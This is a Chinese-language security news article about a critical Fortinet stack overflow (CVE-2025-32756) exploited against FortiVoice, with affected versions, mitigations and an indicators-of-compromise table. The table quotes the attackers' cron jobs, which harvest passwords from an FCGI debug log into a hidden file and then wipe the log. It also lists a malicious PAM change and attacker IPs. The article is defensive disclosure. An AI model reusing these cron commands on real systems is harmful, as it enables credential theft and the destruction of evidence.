官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
Fortinet公司近日披露了一个关键级基于栈的缓冲区溢出漏洞(CVE-2025-32756),该漏洞影响其安全产品线中的多款产品,且已确认有攻击者针对FortiVoice系统实施野外利用。
这个CVSS评分为9.6的漏洞允许远程未认证攻击者通过特制HTTP请求执行任意代码或命令,可能使攻击者完全控制受影响设备。该安全漏洞被归类为基于栈的缓冲区溢出,影响FortiVoice、FortiMail、FortiNDR、FortiRecorder和FortiCamera产品的多个版本。
Fortinet安全研究人员在观察到针对FortiVoice部署的主动利用尝试后发现该漏洞。2025年5月13日官方披露漏洞后,Fortinet立即为所有受影响产品发布安全补丁。
漏洞详情
Fortinet安全公告指出:"FortiVoice、FortiMail、FortiNDR、FortiRecorder和FortiCamera产品中存在的基于栈的溢出漏洞[CWE-121],可能允许远程未认证攻击者通过构造的HTTP请求执行任意代码或命令。"此类漏洞尤其危险,因为它无需认证即可远程利用,使攻击者能完全掌控被入侵系统。
在至少一起已确认的事件中,威胁行为者利用该漏洞入侵FortiVoice系统实施以下恶意操作:
- 扫描内网资产
- 启用FCGI调试功能窃取凭证
- 清除崩溃日志以销毁证据
已观测的攻击模式
Fortinet记录了威胁行为者利用该漏洞攻击FortiVoice部署的具体活动。观测到的攻击模式包括网络侦察、故意删除系统崩溃日志以隐藏恶意活动,以及启用FCGI调试功能以捕获系统凭证或记录SSH登录尝试。
安全研究人员已识别出与这些攻击相关的多个入侵指标(IoCs),包括httpd跟踪日志中的可疑条目、对系统文件的未授权修改,以及设计用于外泄敏感信息的恶意cron任务。
已确认6个IP地址与攻击活动相关:
- 198.105.127.124
- 43.228.217.173
- 156.236.76.90
- 218.187.69.244
FortiVoice零日漏洞(CVE-2025-32756)入侵指标
| 类别 | 指标/详情 | 描述/目的 |
|---|---|---|
| 日志条目 | [fcgid:warn] [pid 1829] [client x.x.x.x:x] mod_fcgid: error reading data, FastCGI server closed connection | httpd日志中的错误,表明FastCGI行为异常 |
[fcgid:error] [pid 1503] mod_fcgid: process /migadmin/www/fcgi/admin.fe(1741) exit(communication error), get unexpected signal 11 | httpd跟踪日志中的信号11(段错误) | |
| 恶意文件 | /bin/wpad_ac_helper(MD5: 4410352e110f82eabc0bf160bec41d21) | 攻击者添加的主要恶意文件 |
/bin/busybox(MD5: ebce43017d2cb316ea45e08374de7315, 489821c38f429a21e1ea821f8460e590) | 恶意或被替换的实用程序 | |
/lib/libfmlogin.so(MD5: 364929c45703a84347064e2d5de45bcd) | 用于记录SSH凭证的恶意库 | |
/tmp/.sshdpm | 包含恶意库收集的凭证 | |
/bin/fmtest(MD5: 2c8834a52faee8d87cff7cd09c4fb946) | 用于扫描网络的脚本 | |
/var/spool/.sync | cron任务外泄的凭证存储位置 | |
| 被修改文件 | /data/etc/crontab | 添加了从fcgi.debug抓取敏感数据的cron任务 |
/var/spool/cron/crontabs/root | 添加了备份fcgi.debug的cron任务 | |
/etc/pam.d/sshd | 添加了加载libfmlogin.so的恶意行 | |
/etc/httpd.conf | 添加了加载socks5模块的行 | |
| 恶意设置 | fcgi debug level is 0x80041``general to-file ENABLED | 启用FCGI调试(非默认设置);记录凭证 |
| 威胁行为者IP | 198.105.127.12443.228.217.17343.228.217.82156.236.76.90218.187.69.244218.187.69.59 | 攻击活动中观测到的IP地址 |
| 恶意cron任务 | 0 */12 * * * root busybox grep -rn passw /var/spool/crashlog/fcgi.debug > /var/spool/.sync; cat /dev/null >/var/spool/crashlog/fcgi.debug | 每12小时从日志提取密码 |
0 */12 * * * root cat /var/spool/crashlog/fcgi.debug > /var/spool/.sync; cat /dev/null >/var/spool/crashlog/fcgi.debug | 每12小时备份FCGI调试日志 |
受影响版本与缓解措施
该漏洞影响Fortinet产品线中的多个版本。FortiVoice 6.4.0至6.4.10、7.0.0至7.0.6以及7.2.0版本均存在风险,需立即更新。同样,FortiMail(最高7.6.2)、FortiNDR(所有1.x版本和7.6.1之前的7.x版本)、FortiRecorder(最高7.2.3)和FortiCamera(最高2.1.3)的多个版本也受影响。
Fortinet强烈建议客户尽快更新至最新修补版本。无法立即更新的组织应考虑禁用HTTP/HTTPS管理接口的临时解决方案以降低风险。
可以通过以下命令检测FCGI调试是否被恶意启用:
diag debug application fcgi
若返回结果包含:
general to-file ENABLED
则表明系统可能已遭入侵。
若无法立即安装补丁,Fortinet建议采取以下临时措施:
- 禁用HTTP/HTTPS管理接口
- 将管理访问限制在可信内网范围
- 监控受影响设备是否存在已知入侵指标
此次事件延续了近年来Fortinet产品频现安全漏洞的模式。2025年初,Fortinet修补了另一个同样被野外利用的关键漏洞(CVE-2024-55591)。2022年底,Fortinet曾修复一个被中俄网络间谍组织积极利用的身份验证绕过漏洞(CVE-2022-40684)。
安全专家强调,像FortiVoice这样的网络安全设备因其在企业网络中的特权地位和对敏感通信的访问权限,成为攻击者的高价值目标。使用任何受影响Fortinet产品的组织应优先处理此安全公告,立即实施建议的缓解措施。
参考来源:
FortiVoice 0-day Vulnerability Exploited in the Wild to Execute Arbitrary Code
Fortinet CVE-2025-32756 Exploited in the Wild: Critical RCE Flaw Hits FortiVoice and More
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf
客服小蜜蜂(微信:freebee1024)